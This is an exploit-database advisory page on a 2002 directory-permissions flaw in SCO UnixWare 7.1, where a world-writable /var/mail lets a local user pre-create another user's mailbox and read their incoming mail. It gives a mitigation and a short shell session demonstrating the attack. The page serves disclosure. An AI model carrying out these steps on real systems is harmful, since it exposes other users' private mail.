header-logo
Suggest Exploit
vendor:
UnixWare
by:
SecurityFocus
7.2
CVSS
HIGH
Directory Permissions Vulnerability
276
CWE
Product Name: UnixWare
Affected Version From: UnixWare 7.1
Affected Version To: UnixWare 7.1
Patch Exists: YES
Related CWE: N/A
CPE: o:sco:unixware_7.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: UnixWare
2002

SCO UnixWare /var/mail Directory Permissions Vulnerability

Certain versions of SCO's UnixWare (only 7.1 was tested) ship with the /var/mail/ directory with permission 777(-rwxrwxrwx). This in effect allows malicious users to read incoming mail for users who do not yet have a mail file (/var/mail/username) present. This may be done by simply creating the file in question with a permission mode which is readable to the attacker.

Mitigation:

Ensure that the /var/mail/ directory has the correct permissions set.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/849/info

Certain versions of SCO's UnixWare (only 7.1 was tested) ship with the /var/mail/
directory with permission 777(-rwxrwxrwx) . This in effect allows malicious users to read incoming mail for users who do not yet have a mail file (/var/mail/username) present. This may be done by simply creating the file in question with a permission mode which is readable to the attacker. 

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier

Now wait for btellier to get some mail...

Navigation

Suggest Exploit

Services By CQR